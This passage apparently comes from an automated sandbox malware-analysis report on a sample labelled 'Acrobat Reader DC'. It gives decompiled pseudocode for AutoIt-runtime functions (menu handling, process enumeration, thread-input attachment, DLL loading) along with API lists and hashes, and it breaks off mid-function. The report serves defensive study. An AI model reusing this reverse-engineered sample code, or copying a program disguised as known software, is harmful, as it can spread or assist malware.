                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004485CB Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004485CB(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, int _a24) {
				struct tagMENUITEMINFOW _v52;
				signed int _t46;
				struct HMENU__* _t58;
				struct HMENU__* _t59;
				signed int _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t72;
				struct HWND__** _t79;
				int _t80;
				struct HWND__* _t81;

				_t61 = _a8;
				_t80 = _a16;
				_t79 = _a4;
				_v52.cbSize = 0x30;
				E00412F40( &(_v52.fMask), 0, 0x2c);
				if(_t80 != 0xffffffff) {
					if(E00441AF5(0x4a8630, _t80,  &_a16,  &_a8) != 0) {
						_t72 =  *0x4a8690; // 0x0
						_t79 =  *( *(_t72 + _a16 * 4));
						_t46 = _a8;
						_t63 =  *0x4a86a4; // 0xa51ad0
						 *(_t61 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t63 + _t46 * 4)))) + 8);
						_t65 =  *0x4a86a4; // 0xa51ad0
						if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + _t46 * 4)))) + 0x88)) == 0xc) {
							L9:
							if(IsMenu( *(_t61 + 8)) == 0) {
								goto L5;
							} else {
								goto L10;
							}
						} else {
							_v52.fMask = 4;
							if(GetMenuItemInfoW( *(_t61 + 8), _t80, 0,  &_v52) == 0) {
								goto L5;
							} else {
								 *(_t61 + 8) = _v52.hSubMenu;
								goto L9;
							}
						}
					} else {
						goto L5;
					}
				} else {
					_t58 = _t79[0x68];
					if(_t58 == 0) {
						_t59 = CreateMenu();
						_t79[0x68] = _t59;
						SetMenu( *_t79, _t59);
						_t58 = _t79[0x68];
						_t79[0x6a] = _t58;
					}
					 *(_t61 + 8) = _t58;
					L10:
					_t81 = CreatePopupMenu();
					if(_t81 == 0) {
						L5:
						return 0;
					} else {
						_v52.dwTypeData = _a20;
						_v52.wID = _a12;
						_v52.fMask = 0x16;
						_v52.fType = 0;
						_v52.hSubMenu = _t81;
						InsertMenuItemW( *(_t61 + 8), _a24, 1,  &_v52);
						DrawMenuBar( *_t79);
						_t79[0x6a] = _t81;
						return 1;
					}
				}
			}














                                  0x004485d2
                                  0x004485d6
                                  0x004485da
                                  0x004485e5
                                  0x004485ec
                                  0x004485f7
                                  0x00448642
                                  0x0044864f
                                  0x0044865b
                                  0x0044865d
                                  0x00448660
                                  0x0044866e
                                  0x00448671
                                  0x00448683
                                  0x004486a7
                                  0x004486b3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448685
                                  0x00448690
                                  0x0044869f
                                  0x00000000
                                  0x004486a1
                                  0x004486a4
                                  0x00000000
                                  0x004486a4
                                  0x0044869f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004485f9
                                  0x004485f9
                                  0x00448601
                                  0x00448603
                                  0x0044860d
                                  0x00448613
                                  0x00448619
                                  0x0044861f
                                  0x0044861f
                                  0x00448625
                                  0x004486b5
                                  0x004486bb
                                  0x004486bf
                                  0x00448644
                                  0x0044864c
                                  0x004486c1
                                  0x004486cb
                                  0x004486d3
                                  0x004486db
                                  0x004486e2
                                  0x004486e9
                                  0x004486ec
                                  0x004486f5
                                  0x004486fb
                                  0x00448709
                                  0x00448709
                                  0x004486bf

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                  • String ID: 0
                                  • API String ID: 176399719-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433D9E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00433D9E(intOrPtr _a4, long* _a8, void* _a12) {
				unsigned int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				char _v540;
				char _v1064;
				char _v1580;
				char _v2096;
				char _v4144;
				void* __edi;
				unsigned int* _t36;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t49;
				long _t50;
				signed int _t54;
				intOrPtr _t62;
				unsigned int _t74;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E00422240(0x102c);
				_t36 =  &_v8;
				__imp__EnumProcesses( &_v4144, 0x800, _t36);
				if(_t36 != 0) {
					_t4 =  &_a12; // 0x443d49
					_t74 = _v8 >> 2;
					 *((char*)( *_t4)) = 0;
					_t38 = E00433D5F( &_v4144, _a4);
					_t81 = _t80 + 4;
					_t54 = 0;
					_v16 = _t38;
					if(_t74 != 0) {
						while( *_a12 == 0) {
							_t78 = OpenProcess(0x410, 0,  *(_t79 + _t54 * 4 - 0x102c));
							__imp__EnumProcessModules(_t78,  &_v12, 4,  &_v8);
							_t42 = _v12;
							__imp__GetModuleBaseNameW(_t78, _t42,  &_v1064, 0x104);
							if(_t42 != 0) {
								E00413A0E( &_v1064,  &_v24,  &_v2096,  &_v540,  &_v1580);
								E00411536( &_v540,  &_v1580);
								_t49 = E004114AB(_t74,  &_v540, _a4);
								_t81 = _t81 + 0x24;
								if(_t49 != 0) {
									_t62 = _v16;
									if(_t62 != 0) {
										_t50 =  *(_t79 + _t54 * 4 - 0x102c);
										if(_t62 == _t50) {
											 *_a8 = _t50;
											goto L11;
										}
									}
								} else {
									 *_a8 =  *(_t79 + _t54 * 4 - 0x102c);
									L11:
									 *_a12 = 1;
								}
							}
							CloseHandle(_t78);
							_t54 = _t54 + 1;
							if(_t54 < _t74) {
								continue;
							}
							break;
						}
					}
					return 1;
				} else {
					return 0;
				}
			}

























                                  0x00433da6
                                  0x00433dab
                                  0x00433dbb
                                  0x00433dc3
                                  0x00433dce
                                  0x00433dd7
                                  0x00433dda
                                  0x00433ddd
                                  0x00433de2
                                  0x00433de5
                                  0x00433de7
                                  0x00433dec
                                  0x00433dfe
                                  0x00433e1f
                                  0x00433e2c
                                  0x00433e32
                                  0x00433e43
                                  0x00433e4b
                                  0x00433e6d
                                  0x00433e80
                                  0x00433e90
                                  0x00433e95
                                  0x00433e9a
                                  0x00433eaa
                                  0x00433eaf
                                  0x00433eb1
                                  0x00433eba
                                  0x00433ebf
                                  0x00000000
                                  0x00433ebf
                                  0x00433eba
                                  0x00433e9c
                                  0x00433ea6
                                  0x00433ec1
                                  0x00433ec4
                                  0x00433ec4
                                  0x00433e9a
                                  0x00433ec8
                                  0x00433ece
                                  0x00433ed1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433ed1
                                  0x00433ed7
                                  0x00433edf
                                  0x00433dc5
                                  0x00433dca
                                  0x00433dca

                                  APIs
                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                  • __wsplitpath.LIBCMT ref: 00433E6D
                                  • _wcscat.LIBCMT ref: 00433E80
                                  • __wcsicoll.LIBCMT ref: 00433E90
                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                  • String ID: I=D
                                  • API String ID: 2903788889-2605949546
                                  • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                  • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448D62(void* __eflags, signed int _a4, signed char _a7, long _a8) {
				intOrPtr _v8;
				signed int _v12;
				long _t44;
				signed int _t45;
				signed char _t55;
				intOrPtr _t61;
				intOrPtr _t66;
				struct HWND__* _t70;
				struct HWND__** _t75;

				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v12) == 0) {
					L27:
					__eflags = 0;
					return 0;
				} else {
					_t61 =  *0x4a8690; // 0x0
					_t66 =  *0x4a86a4; // 0xa51ad0
					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + _a4 * 4))));
					_t75 =  *( *(_t66 + _v12 * 4));
					_t55 = _t75[0x22];
					_t70 =  *_t75;
					_a7 = _t55;
					E00432B92( &_a8);
					_t44 = _t75[0x11];
					_t83 = _t44;
					if(_t44 >= 0) {
						E004413AA(_t83, _t44);
					}
					_t45 = _t55 & 0x000000ff;
					if(_t45 > 0x1b) {
						goto L27;
					} else {
						switch( *((intOrPtr*)(( *(_t45 + 0x448f86) & 0x000000ff) * 4 +  &M00448F62))) {
							case 0:
								__eax = _a8;
								__eflags = __eax;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									goto L23;
								}
								goto L28;
							case 1:
								L19:
								__esi[0x11] = __ebx;
								E00441432(__ecx, __eflags, __ebx, 1) = E00430B87(_v8, __esi, 1);
								goto L23;
							case 2:
								__eax = _a8;
								__eflags = __eax;
								if(__eax < 0) {
									goto L27;
								} else {
									__eax = SendMessageW(__edi, 0x2001, 0, __eax);
									goto L23;
								}
								goto L28;
							case 3:
								__eax = _a8;
								__eflags = __eax;
								if(__eax < 0) {
									goto L27;
								} else {
									__eax = SendMessageW(__edi, 0x111d, 0, __eax);
									goto L23;
								}
								goto L28;
							case 4:
								__eax = _a8;
								__eflags = __eax;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									__ecx = __esi[0xc];
									__eax = InvalidateRect(__esi[0xc], 0, 1);
									goto L23;
								}
								goto L28;
							case 5:
								__eax = _a8;
								__eflags = __eax - 0xffffffff;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									__eflags = __esi[0x22] & 0x00000020;
									if((__esi[0x22] & 0x00000020) == 0) {
										__eax =  *__esi;
										__edi = ShowWindow;
										__eax = ShowWindow( *__esi, 0);
										__ecx =  *__esi;
										ShowWindow( *__esi, 5) = SetFocus( *__esi);
									}
									goto L23;
								}
								goto L28;
							case 6:
								_t57 = _a8;
								if(_t57 == 0xfffffffe) {
									goto L27;
								} else {
									_t86 = _t57 - 0xfe000000;
									if(_t57 != 0xfe000000) {
										SendMessageW(_t70, 0x1001, 0, _t57);
										SendMessageW(_t70, 0x1026, 0, _t57);
										_t49 = E00430B87(_v8, _t75, 1);
									} else {
										_t75[0x11] = _t57;
										_t49 = E00441432(_t63, _t86, _t57, 1);
									}
									L23:
									if( *0x49751c == 0 || _a7 != 8) {
										return 1;
									} else {
										return _t49 | 0xffffffff;
									}
								}
								goto L28;
							case 7:
								__eflags = __ebx;
								if(__ebx < 0) {
									goto L27;
								} else {
									__eax = GetWindowLongW(__edi, 0xfffffff0);
									__eax = __eax | 0x0000000b;
									__eflags = __eax;
									__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
									goto L19;
								}
								goto L28;
							case 8:
								goto L27;
						}
					}
				}
				L28:
			}












                                  0x00448d83
                                  0x00448f54
                                  0x00448f56
                                  0x00448f5c
                                  0x00448d89
                                  0x00448d8c
                                  0x00448d9a
                                  0x00448da0
                                  0x00448da6
                                  0x00448da8
                                  0x00448dae
                                  0x00448db4
                                  0x00448db7
                                  0x00448dbc
                                  0x00448dc2
                                  0x00448dc4
                                  0x00448dc7
                                  0x00448dc7
                                  0x00448dcc
                                  0x00448dd2
                                  0x00000000
                                  0x00448dd8
                                  0x00448de2
                                  0x00000000
                                  0x00448e3c
                                  0x00448e3f
                                  0x00448e41
                                  0x00000000
                                  0x00448e47
                                  0x00448e4a
                                  0x00448e4d
                                  0x00000000
                                  0x00448e4d
                                  0x00000000
                                  0x00000000
                                  0x00448ed9
                                  0x00448edc
                                  0x00448eeb
                                  0x00000000
                                  0x00000000
                                  0x00448e57
                                  0x00448e5a
                                  0x00448e5c
                                  0x00000000
                                  0x00448e62
                                  0x00448e6b
                                  0x00000000
                                  0x00448e6b
                                  0x00000000
                                  0x00000000
                                  0x00448e76
                                  0x00448e79
                                  0x00448e7b
                                  0x00000000
                                  0x00448e81
                                  0x00448e8a
                                  0x00000000
                                  0x00448e8a
                                  0x00000000
                                  0x00000000
                                  0x00448e95
                                  0x00448e98
                                  0x00448e9a
                                  0x00000000
                                  0x00448ea0
                                  0x00448ea3
                                  0x00448ea6
                                  0x00448eab
                                  0x00448eb3
                                  0x00000000
                                  0x00448eb3
                                  0x00000000
                                  0x00000000
                                  0x00448ef2
                                  0x00448ef5
                                  0x00448ef8
                                  0x00000000
                                  0x00448efa
                                  0x00448efd
                                  0x00448f00
                                  0x00448f05
                                  0x00448f0c
                                  0x00448f0e
                                  0x00448f10
                                  0x00448f19
                                  0x00448f1b
                                  0x00448f25
                                  0x00448f25
                                  0x00000000
                                  0x00448f0c
                                  0x00000000
                                  0x00000000
                                  0x00448de9
                                  0x00448def
                                  0x00000000
                                  0x00448df5
                                  0x00448df5
                                  0x00448dfb
                                  0x00448e16
                                  0x00448e25
                                  0x00448e32
                                  0x00448dfd
                                  0x00448e00
                                  0x00448e03
                                  0x00448e03
                                  0x00448f2b
                                  0x00448f32
                                  0x00448f51
                                  0x00448f3a
                                  0x00448f43
                                  0x00448f43
                                  0x00448f32
                                  0x00000000
                                  0x00000000
                                  0x00448ebb
                                  0x00448ebd
                                  0x00000000
                                  0x00448ec3
                                  0x00448ec6
                                  0x00448ecc
                                  0x00448ecc
                                  0x00448ed3
                                  0x00000000
                                  0x00448ed3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448de2
                                  0x00448dd2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                  • SendMessageW.USER32(76F1D360,00001001,00000000,?), ref: 00448E16
                                  • SendMessageW.USER32(76F1D360,00001026,00000000,?), ref: 00448E25
                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                  • String ID:
                                  • API String ID: 3771399671-0
                                  • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                  • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                  • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00434621(void* __ecx, int _a4, int _a8, int _a12) {
				long _v8;
				int _t16;
				long _t17;
				long _t19;
				long _t22;
				long _t24;
				long _t32;
				long _t33;
				long _t35;
				struct HWND__* _t38;
				long _t43;
				void* _t55;

				_t38 = _a8;
				if(_t38 != 0) {
					L2:
					_a8 = 0;
					_v8 = 0;
					_t43 = GetCurrentThreadId();
					if(_a12 == 0) {
						if(_t38 != 0) {
							_t17 =  *0x4a95bc; // 0x0
							AttachThreadInput(_t43, _t17, 0);
							_t33 =  *0x4a95c0; // 0x0
							_t19 =  *0x4a95bc; // 0x0
							if(_t33 != _t19) {
								AttachThreadInput(_t33, _t19, 0);
							}
						}
						_t32 =  *0x4a95c0; // 0x0
						_t16 = AttachThreadInput(_t43, _t32, 0);
						goto L18;
					} else {
						_t22 = GetWindowThreadProcessId(GetForegroundWindow(), 0);
						 *0x4a95c0 = _t22;
						_a12 = AttachThreadInput(_t43, _t22, 1);
						if(_t38 == 0) {
							_t16 = _v8;
						} else {
							_t24 = GetWindowThreadProcessId(_t38,  &_v8);
							_t35 =  *0x4a95c0; // 0x0
							 *0x4a95bc = _t24;
							if(_t35 != _t24) {
								_a8 = AttachThreadInput(_t35, _t24, 1);
								_t24 =  *0x4a95bc; // 0x0
							}
							_t16 = AttachThreadInput(_t43, _t24, 1);
						}
						if(_a12 != 0 || _a8 != 0 || _t16 != 0) {
							L18:
							goto L19;
						} else {
							_t16 =  *0x4a95c0; // 0x0
							if(_t43 != _t16) {
								goto L18;
							} else {
								_t55 = _t16 -  *0x4a95bc; // 0x0
								if(_t55 != 0) {
									goto L18;
								} else {
									 *((intOrPtr*)(_a4 + 0x20)) = 0;
									return _t16;
								}
							}
						}
					}
				} else {
					_t16 = _a4;
					if( *((intOrPtr*)(_t16 + 9)) == 0) {
						L19:
						return _t16;
					} else {
						goto L2;
					}
				}
			}















                                  0x00434627
                                  0x0043462e
                                  0x0043463c
                                  0x0043463d
                                  0x00434640
                                  0x00434649
                                  0x0043464e
                                  0x004346e9
                                  0x004346eb
                                  0x004346f3
                                  0x004346f5
                                  0x004346fb
                                  0x00434702
                                  0x00434707
                                  0x00434707
                                  0x00434702
                                  0x00434709
                                  0x00434712
                                  0x00000000
                                  0x00434654
                                  0x0043465c
                                  0x0043466c
                                  0x00434673
                                  0x00434678
                                  0x004346aa
                                  0x0043467a
                                  0x0043467f
                                  0x00434685
                                  0x0043468b
                                  0x00434692
                                  0x0043469a
                                  0x0043469d
                                  0x0043469d
                                  0x004346a6
                                  0x004346a6
                                  0x004346b1
                                  0x00434714
                                  0x00000000
                                  0x004346bd
                                  0x004346bd
                                  0x004346c4
                                  0x00000000
                                  0x004346c6
                                  0x004346c6
                                  0x004346cc
                                  0x00000000
                                  0x004346ce
                                  0x004346d3
                                  0x004346de
                                  0x004346de
                                  0x004346cc
                                  0x004346c4
                                  0x004346b1
                                  0x00434630
                                  0x00434630
                                  0x00434636
                                  0x00434715
                                  0x0043471a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00434636

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00434643
                                  • GetForegroundWindow.USER32(00000000), ref: 00434655
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004542ED Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E004542ED(void* _a4, signed int _a8, signed int _a12, intOrPtr _a16, _Unknown_base(*)()* _a20, intOrPtr* _a24, intOrPtr* _a28) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int __edi;
				signed int __esi;
				intOrPtr _t118;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t128;
				intOrPtr _t134;
				intOrPtr _t135;
				struct HINSTANCE__** _t144;
				void* _t147;
				void* _t151;
				struct HINSTANCE__* _t155;
				intOrPtr* _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				signed int _t173;
				struct HINSTANCE__* _t181;
				signed int _t187;
				signed int _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t205;
				void* _t206;
				void* _t207;

				_t158 = _a4;
				_t203 = _a20;
				_t200 = 0;
				 *_a28 = 0;
				 *_a24 = 0;
				E00408F40(0, _t203);
				 *((intOrPtr*)(_t203 + 8)) = 1;
				 *_t203 = 1;
				_t118 =  *((intOrPtr*)(_t158 + 8));
				_a20 = 0;
				_v16 = 0;
				_v20 = _t118;
				if(_t118 <= 0) {
					L13:
					return 6;
				} else {
					while(_a20 == 0) {
						_t188 =  *(_t158 + 4);
						_t144 = ( *(_t158 + 4))[_t200];
						if( *_t144 == 0) {
							L11:
							_t200 = _t200 + 1;
							if(_t200 < _v20) {
								continue;
							} else {
								if(_a20 != 0) {
									break;
								} else {
									goto L13;
								}
							}
						} else {
							_t188 =  *_t144;
							_v8 = 0;
							if( *((intOrPtr*)( *_t144 + 4)) <= 0) {
								goto L11;
							} else {
								_a4 = 0;
								while(1) {
									_t147 = E00422EED(_t200, _t203, _a8,  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 8)) + _a4)));
									_t205 = _t205 + 8;
									if(_t147 == 0) {
										break;
									}
									_t144 = ( *(_t158 + 4))[_t200];
									_t188 =  *_t144;
									_a4 = _a4 + 0xc;
									_t187 = _v8 + 1;
									_v8 = _t187;
									if(_t187 <  *((intOrPtr*)( *_t144 + 4))) {
										continue;
									} else {
										goto L11;
									}
									goto L46;
								}
								_t181 = ( *(( *(_t158 + 4))[_t200]))[2];
								_t195 = _a12;
								_t151 = _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2 + _v8 + _v8 * 2;
								if(_t195 <  *((intOrPtr*)(_t181 + _t151 + 4)) || _t195 >  *((intOrPtr*)(_t181 + _t151 + 8))) {
									return 7;
								} else {
									_a20 = GetProcAddress( *( *(( *(_t158 + 4))[_t200])),  *(( *(( *(_t158 + 4))[_t200]))[2] + _t151));
									_t155 =  *(_t158 + 4);
									_t188 =  *( *(_t155[_t200]));
									_v16 = GetProcAddress( *( *(_t155[_t200])), "AU3_FreeVar");
									goto L11;
								}
							}
						}
						goto L46;
					}
					_t201 = _a12;
					_t122 = E004135BB(_t188, _t201, _t203, _t201 << 4);
					_t159 = 0;
					_t206 = _t205 + 4;
					_a4 = _t122;
					_a8 = 0;
					if(_t201 > 0) {
						_t202 = _t122;
						do {
							_t134 = _a16;
							_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)) + 8)) + 0xfffffffe;
							if(_t173 > 5) {
								L25:
								 *_t202 = 1;
